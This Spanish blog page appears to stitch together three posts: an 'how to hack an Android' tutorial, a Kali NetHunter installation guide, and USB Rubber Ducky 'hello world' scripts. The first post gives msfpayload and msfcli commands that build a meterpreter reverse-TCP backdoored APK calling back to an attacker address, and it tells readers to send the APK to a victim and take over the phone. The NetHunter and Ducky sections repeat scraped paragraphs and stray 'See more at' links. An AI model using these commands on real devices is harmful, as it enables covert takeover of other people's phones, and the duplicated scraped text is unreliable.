Vistas de página en total

Mostrando entradas con la etiqueta android. Mostrar todas las entradas
Mostrando entradas con la etiqueta android. Mostrar todas las entradas

miércoles, 24 de febrero de 2016

Como hackear un Android [Post + Videotutorial.]

En esté post aprenderás a entrar en un android , con la maravillosa herramienta llamada Metasploit , dirás  ¿Enserio? , se podría entrar en un Android, claro! Empecemos.....

1º.-Actualicen su Metasploit, para asegurarse de que se le cargara los exploits...etc pues estos que usaremos son Actuales.
2º.-Una vez hecho eso pondremos en Metasploit lo siguiente....
search Android

Bueno, ahora puedes ver que sacaron un Exploit Handler + 2 Payload! eso nos da la posibilidad de hacer un APK infectada! bien...!! Hagamos este Apk Infectada...... Para hacerlo usaremos "MsfPayload" se aria así -> 
sudo msfpayload android/meterpreter/reverse_tcp  LHOST="Tu ip/No-ip" LPORT=Puerto R > "Ruta+ Aplicación.apk"

Ejemplo : 
 sudo msfpayload android/meterpreter/reverse_tcp  LHOST=192.168.1.35 LPORT=23 R > /home/icebreaker/Escritorio/Hack.apk
Bueno con eso se les creara un Apk infectada, se lo enviamos y ponemos a la escucha nuestro exploit , por qué pones “R” si siempre creamos el ejecutable con “X” , tenemos que decirle a
msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk! , jejej bien ¿no? Pueden comprobarlo con el comando “file nombre.apk” y les saldrá la info todo bien
escrito....Bueno una vez hecho eso, cargamos el exploit ......
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST=”Su ip puesta en el backdoor” LPORT="Su puerto" E
Ejemplo:
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST=192.168.1.35 LPORT=25 E 

 Bueno ahora la victima cuando se instale la Apk, infectada nos saldrá esto.... 

O sí! Tenemos la sesión ese android es nuestro! , ahora podemos , poner Help , para

ver los comandos que nos brinda Meterpreter ,para esté dispositivo...

Bueno hay pueden , ir probando ya tienen su dispositivo infectado! , acá les dejo el video hecho por mí para que lo vean y prueben , también trae como me muevo dentro de el móvil...
Link del video.




PDF

martes, 16 de febrero de 2016

NetHunter: Kali Linux en tu Android

Vuelvo a publicar en hacking-etico.com tras unos meses un poco “diferentes” y regreso para traeros un artículo que os puede resultar muy interesante.

Todos nuestros visitantes sabéis o habéis oído hablar de Kali Linux, la conocida distribución Linux que incorpora multitud de herramientas para testear todo tipo de sistemas y conexiones. Esta “distro” es la sucesora de la archiconocida Backtrack. Pues bien, ya la tenemos disponible para smartphones.

En mayor o menor medida, en el Play Store habitan una cantidad ingente de aplicaciones para generar claves WiFi de todo tipo de fabricantes y a día de hoy el 99% son aplicaciones extremadamente malas (probad probad xD). Unas generan supuestas claves para redes Jazztel, WLAN, etc… pero en muy pocos casos funciona. A veces porque los usuarios se les ha removido la conciencia “segura” y otras porque simplemente no se corresponden con la red en cuestión. Y otras son aplicaciones fakes en toda regla.

Pocas alternativas hay que no sean generadores de diccionarios sin más. Metes el SSID y la MAC y a marchar con o sin resultados (esto último casi siempre).

Pero si hay una interesante que ya publiqué el año pasado. Dsploit. Esta aplicación es más avanzada y funciona en teléfonos rooteados y a ser posible con cierta potencia. Con ella puedes snifar tráfico de la red WiFi que estés conectado, capturar sesiones, envenenamiento DNS, etc.. Tiene algunos bugs que pueden hacer un reboot indeseado pero es más que apta para por ejemplo, snifar tráfico de tu red Wifi e interpretarla con el Wireshark o el Networkminer.

Pero hasta ahora sólo teníamos esas opciones. Hasta que los chicos de www.offensive-security.com nos han traído un regalito. Kali Linux NetHunter. Y vamos a “fusionarlo” con Android.
Advertir que solo está disponible para dispositivos Nexus 5, Nexus 7 y Nexus 10 (al menos por ahora) y que debes tener rooteado el teléfono y con su recovery. NO es en sí una ROM por tanto si usas MULTIROM (tener varias rom en el mismo teléfono) e instalas como secundaria “cascará” al 100%.

Bien, vayamos con la faena.

Para instalar NetHunter en el Nexus 5 tenemos dos opciones:

A: Instalar sin MULTIROM.

B: Instalar con MULTIROM.

No pretende ser esto un tutorial para androides pero si una pequeña aclaración ya que hay escasa información sobre este tema a día de hoy. Hay que tener una ligera idea sobre ciertos términos y conceptos.

Partiremos de la base de que hay un recovery personalizado instalado. Para los newbies han de mirarse primero conceptos clave para personalizar un smartphone Android.

Fundamental descargar:STOCK ROM 4.4.4 en formato .zip- Descargar (Enlace MEGA)
 SuperSU (Rootear) – Descargar

 Opción A

Antes de nada aclarar que hay otro tipo de instalación que es bajándose un instalador de la página de www.offensive-security.com, instalarlo en Windows e ir haciendo los pasos. Personalmente no lo he probado ya que prefería asegurarme usando el “método tradicional”. Pero esto es a elección del usuario. Nosotros vamos a usar el método más común de instalar una ROM.

Hay que trabajar siempre con STOCK ROM 4.4.4. Supongamos que hemos entrado en el recovery, hemos hecho los WIPES (wipear es opcional pero es altamente recomendable aunque desaparecerán todas las aplicaciones y configuraciones, no así las imágenes a no ser que hayáis personalizado los wipes y elegido el “format storage”)  pertinentes para dejar a CERO nuestro teléfono e instalamos nuestra STOCK ROM 4.4.4. Seguidamente y sobre la misma instalación FLASHEAMOS el ZIP que contiene el SUPERSU el cual ROOTEARÁ el teléfono.

A continuación iniciamos el teléfono, configuramos la cuenta gmail y nos vamos al Play Store previa conexión a nuestra WiFi. Descargamos BUSYBOX (yo lo he tenido que instalar sino no me funcionaba) e instalamos.

Reiniciamos nuestro dispositivo en modo recovery, esto es pulsando tecla Volumen Abajo y Power a la vez.

Ahora toca flashear nuestra herramienta NetHunter encima de nuestra STOCK ROM 4.4.4 ya que complementa nuestro sistema con las herramientas de seguridad. Por ello decimos que no es en sí una ROM 100%.

El proceso es lento. Muy lento, así que si todo va bien veréis una barra de progreso que avanza a pasos de tortuga disecada. (Momento para sacar un “beer” mientras esperamos el “hack” xD)

Una vez finalizado el proceso, reiniciáis y debe funcionar vuestra STOCK ROM 4.4.4 rooteada con el añadido de NetHunter.

Deberíais ver en las aplicaciones algunas que no son habituales nada más instalar el teléfono. Veamos en la imagen.



Opción B

Aquí viene cuando la “matan” verdaderamente.

Para quién no conozca MULTIROM es un “Plus” del recovery para poder instalar diferentes ROMS personalizadas siempre que la capacidad de almacenamiento de nuestro teléfono lo permita. Una especie de MULTIBOOT que en sistemas de ordenadores sería como tener Windows, Linux y Hackintos para elegir en el arranque.

Antes de nada tenemos que tener estas premisas claras:

    Nexus 5 funcionando con STOCK ROM o ROM PERSONALIZADA.
    Teléfono ROOTEADO.
    Más los archivos indicados en negrita anteriormente.

En nuestro Play Store, buscamos la APP de nombre MULTIROM, que instalamos y ejecutamos.

 Pedirá permisos de ROOT que concederemos como generosos usuarios. Marcamos los pasos de la imagen, aunque os saldrá a vosotros en rojo la línea de “Kernel”.
,
 Hacemos los reinicios pertinentes y entramos a recovery. (Volumen Abajo y Power). Hecho esto deberíamos tener instalado ya un recovery con soporte multirom.

Ahora vamos a añadir una ROM a nuestro MULTIARRANQUE.

Entramos en Recovery, con Volumen Abajo y Power. Seguimos estos pasos: ADVANCED/MULTIROM/ADD ROM botón NEXT luego opción ZIP FILE buscamos nuestra STOCK ROM 4.4.4 la seleccionamos y procedemos a instalar. Cuando acabe, volvemos a hacer estos pasos pero eligiendo LIST ROM en vez de ADD ROM y seleccionando SUPERSU para rootear esta ROM secundaria.

Cuando acabe veremos un nuevo menú, el multiarranque (una maravilla) elegimos la segunda opción que será nuestra ROM secundaria donde queremos instalar el NetHunter. Iniciamos, conectamos a Internet, añadimos cuenta gmail, abrimos PLAY STORE buscamos BUSYBOX (repito que me fue necesario) y reiniciamos en modo recovery.

Ahora vamos a instalar NetHunter ENCIMA de nuestra STOCK ROM 4.4.4 SECUNDARIA porque como ya hemos dicho, NetHunter necesita apoyarse en esta versión de Android para funcionar.

Elegimos en el TWRP RECOVERY:

– ADVANCED

– MULTIROM

– LIST ROM

– Seleccionar la que aparece

– Flash ZIP (botón pequeño)

– Buscamos NetHunter e instalamos.

Unas imágenes para que podáis ver mejor lo que aparecerá.

 Tras unos interminables 20 minutos aproximadamente se instalará por completo. No os desesperéis porque tarda. A continuación reiniciais y elegís la ROM secundaria. Aviso que si os despistáis cargará la ROM Primaria que es también STOCK ROM (cuántas veces habré dicho STOCK ROM? xD) pero sin el complemento (de un 1gb nada más y nada menos ) NetHunter.

Elegís la segunda en la lista, y cargará. Ahora en el menú aplicaciones podréis ver algunas APP que no vienen “de fábrica”. Estás APPs son para utilizar Kali Linux NetHunter en tu terminal Nexus.
 Es posible que quizás al iniciar el la ROM con NetHunter y entrar a KaliMenú no encuentre rutas en la consola (terminal). Para ello el proceso a seguir es:

    Iniciar Recovery
    ADVANCED/MULTIROM/LIST ROM Seleccionar la recién instalada STOCK ROM con Nethunter como secundaria.
    Flash ZIP e instalar encima de nuevo STOCK ROM 4.4.4
    Al acabar el proceso, realizar lo mismo que en este primer paso, pero instalar SUPERSU(para ROOTEAR).
    Volver a hacer lo mismo pero seleccionar ahora NetHunter.

Este paso tuve que realizarlo para que me funcionara por completo en la consola del KaliLinux en el teléfono ya que iniciaba pero no existían las rutas de las aplicaciones.

He intentado resumir el proceso y generalizarlo un poco puesto que como ya advertí no es un tutorial en sí y pueden faltar pasos que los he obviado.

Pues esto es todo, cómo utilizar NetHunter para probar nuestros sistemas será en otro capítulo de nuestro blog.

Espero que ante tanto caos os haya servido de referencia y podáis disfrutar de un multiarranque para auditar vuestras redes.
Hacemos los reinicios pertinentes y entramos a recovery. (Volumen Abajo y Power). Hecho esto deberíamos tener instalado ya un recovery con soporte multirom.
Ahora vamos a añadir una ROM a nuestro MULTIARRANQUE.
Entramos en Recovery, con Volumen Abajo y Power. Seguimos estos pasos: ADVANCED/MULTIROM/ADD ROM botón NEXT luego opción ZIP FILE buscamos nuestra STOCK ROM 4.4.4 la seleccionamos y procedemos a instalar. Cuando acabe, volvemos a hacer estos pasos pero eligiendo LIST ROM en vez de ADD ROM y seleccionando SUPERSU para rootear esta ROM secundaria.
Cuando acabe veremos un nuevo menú, el multiarranque (una maravilla) elegimos la segunda opción que será nuestra ROM secundaria donde queremos instalar el NetHunter. Iniciamos, conectamos a Internet, añadimos cuenta gmail, abrimos PLAY STORE buscamos BUSYBOX (repito que me fue necesario) y reiniciamos en modo recovery.
Ahora vamos a instalar NetHunter ENCIMA de nuestra STOCK ROM 4.4.4 SECUNDARIA porque como ya hemos dicho, NetHunter necesita apoyarse en esta versión de Android para funcionar.
Elegimos en el TWRP RECOVERY:
– ADVANCED
– MULTIROM
– LIST ROM
– Seleccionar la que aparece
– Flash ZIP (botón pequeño)
– Buscamos NetHunter e instalamos.
Unas imágenes para que podáis ver mejor lo que aparecerá.
- See more at: http://hacking-etico.com/2014/10/06/nethunter-kali-linux-en-tu-android/#more-3741
SuperSU (Rootear) – Descargar

Cuando el pato teclea Cuack Cuack – Parte 2

Seguimos con la trilogía de pato. Ya vimos en la parte 1 qué era el pato (USB Rubber Ducky) y cómo protegernos, en este caso vamos a ver algunos ejemplos del pato en diferentes sistemas operativos, por lo que va a comenzar a hacer Cuack
Lo primero que necesitamos para poderlo usar es aprender su lenguaje de programación el cual veréis que es muy sencillo. Aquí realizaremos el Hola Mundo en Windows, Mac, Linux y Android. Lo que vamos a hacer es abrir un editor de texto y escribir la conocida frase con la que empezamos a programar todo el mundo. Primero veremos el código y cómo afecta, luego veremos las herramientas para compilarlo.

Comenzamos con nuestro amigo Windows de Bill Puertas.
?
1
2
3
4
5
6
7
8
   
DELAY 3000
GUI r
DELAY 200
STRING notepad
ENTER
DELAY 200
STRING Hola mundo!!!
ENTER
Comenzamos introduciendo el comando DELAY -dicho comando mide el tiempo en milisegundos- que nos hará esperar 3 segundos para que le dé tiempo a Windows a reconocer el “teclado”. A continuación, con GUI r lanzamos el ejecutar, GUI emula la tecla de Windows, Super-Key o Command según el sistema operativo, al combinarlo con la tecla r y se nos abrirá la ventana de ejecutar de Windows.
Volvemos a esperar 200 milisegundos para dar tiempo a Windows a abrirnos la pantalla y tecleamos, con el comandos STRING, notepad. Después presionamos ENTER.
n
Una vez dominado Windows seguimos con la versión para Mac OS X de Jobs que veréis que es muy similar.

   
DELAY 3000
GUI SPACE
STRING TextEdit
ENTER
DELAY 2000
GUI n
DELAY 750
STRING Hola Mundo!!
ENTER

Como observamos en el segundo caso, los comandos son similares a Windows la diferencia es que en lugar de usar GUI r usamos GUI SPACE que nos abre el lanzador de aplicaciones.

Abrimos el TextEdit, en el caso de MAC, tenemos que decirle que queremos uno nuevo fichero de texto antes de ponernos a escribir en él, por lo que ejecutamos GUI n.
Ahora ya solo nos queda escribir el hola mundo con STRING Hola Mundo!! 😀 como ya hicimos en Windows. - See more at: http://hacking-etico.com/2015/05/16/cuando-el-pato-teclea-cuack-cuack-parte-2/#sthash.ho96N1g1.dpuf
Ahora ya solo nos queda escribir el hola mundo con STRING Hola Mundo!! 😀 como ya hicimos en Windows.
Seguimos con el tercer caso. En este momento vamos con GNU/Linux del tito Richard y Linus en su versión Ubuntu + Gnome3.
   
DELAY 3000
ALT F2
DELAY 500
STRING gedit
DELAY 500
ENTER
DELAY 750
STRING Hola Mundo!!

Como podéis ver, aquí difiere un poco el código, ya que no usamos GUI sino ALT F2 porque es como se abre el lanzador de aplicaciones en Gnome3, pero el resto es igual que en los anteriores sistemas.
 Ahora introducimos una vez más el editor de texto con el comando STRING gedit y lo ejecutamos.
Ya tenemos listo nuestro gedit para escribir nuestra famosa frase Hola Mundo. 
Vamos con nuestro cuarto y ultimo caso ¿Sueñan los androides con ovejas eléctricas?

Pues si no lo hacen nosotros vamos a hacer que lo hagan 😉

Vamos a usar inkpad en Android, dado que lo tenia instalado en mi móvil de pruebas y así no busco otro editor de texto simple.

   
DELAY 3100
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
CTRL z
DELAY 1200
STRING inkpad
DELAY 1000
DOWN
DOWN
DOWN
DOWN
ENTER
DELAY 2000
ENTER
DELAY 200
STRING Hola mundo!
Como observamos en este último caso usamos algunos comandos más. El primero es ESCAPE que nos sirve para volver hacia detrás y salir si tenemos alguna aplicación ejecutándose en ese momento.

Una vez en el escritorio usamos CTRL z que nos permitirá usar el buscador de Android donde tecleamos el nombre del programa inkpad, le damos un segundo para que busque y bajamos cuatro posiciones con DOWN hasta la aplicación y presionamos ENTER.
.
Esperamos 2 segundos para que se abra la aplicación y pulsamos ENTER de nuevo y ya escribimos nuestra frase Hola mundo!
FIN
 
Esperamos 2 segundos para que se abra la aplicación y pulsamos ENTER de nuevo y ya escribimos nuestra frase Hola mundo! - See more at: http://hacking-etico.com/2015/05/16/cuando-el-pato-teclea-cuack-cuack-parte-2/#sthash.ho96N1g1.dpuf
Esperamos 200 milisegundos y tecleamos Hola Mundo!! que aparecerá escrito gracias al comando STRING - See more at: http://hacking-etico.com/2015/05/16/cuando-el-pato-teclea-cuack-cuack-parte-2/#sthash.ho96N1g1.dpuf